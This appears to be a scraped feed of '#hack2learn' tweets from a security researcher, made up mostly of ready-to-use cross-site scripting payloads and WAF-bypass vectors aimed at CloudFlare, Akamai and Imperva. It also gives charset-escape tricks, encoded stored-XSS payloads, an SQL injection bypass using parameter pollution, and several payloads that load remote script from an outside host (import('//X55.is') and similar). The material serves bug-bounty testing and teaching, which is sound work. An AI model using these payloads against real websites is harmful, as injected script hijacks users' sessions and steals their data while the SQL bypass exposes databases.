Top Tweets for #hack2learn
JSi - Escape the Escape
Chinese & Japanese Charsets
GBK, GBK2312, GBK19030
%81'/alert(1)//
ISO-2022-JP
%1B%28%4A'/alert(1)//
Bypass this filter:
'-alert(1)-' ➡️ \'-alert(1)-\'
\'-alert(1)// ➡️ \\\'-alert(1)//
More tricks in the ebook:
https://t.co/3lfdL6Lcqt
#hack2learn

Brute Staged XSS Payload
Stage 1 - No parentheses, high obfuscation:
innerHTML=URL,outerHTML=textContent
Stage 2 - Never sent to server, customizable:
&#60Img/Src/OnError=alert(1)&#62k
Example: https://t.co/795nC9jksV
Reference: https://t.co/byAmoq8WG1
#hack2learn

People assume wrong things all the time, try to spot that and you have an edge.
That's actually how we hack and bypass things.
#hack2learn.

Another variation of the classic #XSS #CloudFlare #WAF bypass.
Instead of:
1"><Svg/OnLoad=alert(1)>
Use:
1"Onxx=><Svg/Onload=alert(1)//
#hack2learn

@h4x0r_dz In labs you know exactly where the vulnerability or the vulnerable parameter is, and also there are no WAFs in place. But in the real world, you first need to analyze the flow 7-8 times, then find an injection point, and then try to exploit it
so labs ≠ real targets.
#hack2learn

Another #XSS Payload to Rule Them All!
#Bypass Imperva, Akamai and CloudFlare WAF
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:https://t.co/Ng2aOLONda)}>
PoC: https://t.co/k2GsBxMmG5
#hack2learn @KN0X55

One #XSS Payload to Rule Them All
#Bypass Akamai, Imperva and CloudFlare #WAF
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
#hack2learn @KN0X55

BypaXSS
Free tool to build #XSS bypass vectors and payloads.
First version available, still in development.
https://t.co/QFXUyQnOz3
#hack2learn

A trick using PHP's weird behavior if a WAF decodes everything before parsing.
It might start filtering considering the anchor with dangling (but harmless) markup instead of the real #XSS vector.
param%00p%3D<A/Href="<Svg/OnLoad=alert(1)//
https://t.co/o75F5SPpey
#hack2learn

P2 - Stored XSS using mixed encoding.
Payload:
&ltimg onerror&#61;alert(123) src&gt
While testing for stored XSS, always test different encodings: (semicolons ; aren’t always required).
    HEX    NUM   HTML  UNI
<   &#x3c  &#60  &lt   \u003C
>   &#x3e  &#62  &gt   \u003E
#hack2learn

Best Alternatives to alert(1) #XSS Payload
1. import('//X55.is')
https://t.co/44PpUdSWrz
2. $.getScript('//X55.is') *
https://t.co/nDsnfNDcMo
3. appendChild(createElement`script`).src='//X55.is'
https://t.co/5u88Jwbwmc
* requires jQuery loaded on DOM
#hack2learn

Improve your #BugBounty reports
Using a Remote #XSS Call
1. import('//X55.is')
https://t.co/44PpUdSoC1
2. $.getScript`//X55.is` (requires jQuery)
https://t.co/ZQyAdexV0F
3. appendChild(createElement`script`).src='//X55.is' https://t.co/5u88JwaYwE
#hack2learn #hack2earn

Hey bug hunter!
Do you have a WAF or any other filter in your way?
Let's COLLABORATE! 🤩
Any bug, 50/50 just DM me with details.
#hack2learn

JSi - Escape the Escape
Chinese and Japanese Charsets
GBK, GBK2312, GBK19030
%81'/alert(1)//
ISO-2022-JP
%1B%28%4A'/alert(1)//
For when a filter does that:
'-alert(1)-' ➡️ \'-alert(1)-\'
\'-alert(1)// ➡️ \\\'-alert(1)//
#XSS #bypass #hack2learn
https://t.co/ULkhcUmwH3

Between white and black, there's a lot of grey.
#Hacking
That's something you learn in LIFE itself.
#hack2learn

#DidYouKnow?
You can create a #XSS vector with almost ANY tag name and the ONFOCUS event handler using the following keywords:
ContentEditable AutoFocus
Example:
<XSS ContentEditable AutoFocus OnFocus=alert(1)>
Check it out:
https://t.co/nGtBvSITdn
#hack2learn

Best Alternatives to "alert(1)" #XSS Payload
1. import('//X55.is')
https://t.co/44PpUdSoC1
2. $.getScript('//X55.is')
https://t.co/nDsnfNCEWQ
3. appendChild(createElement'script').src='//X55.is'
https://t.co/OW6tE3xCdl
Tip: use src attribute to store '//X55.is'.
#hack2learn

Develop your true hacking skills with Static Analysis, #XSS and Bash.
#hack2learn
https://t.co/CgcKyD6gVM

#SQL Injection #Bypass Akamai #WAF
(Using #HPP)
q=1'Union DistinctRow/*&q=*/Select 1
#hack2learn 💪

Just another interesting construct for #XSS disguising the tag name, event handler and JS code as a fully validated URL.
<<https:https://t.co/OL3UAun0OS AutoFocus ContentEditable>>
PoC
https://t.co/MmFuukCJ5S
#hack2learn




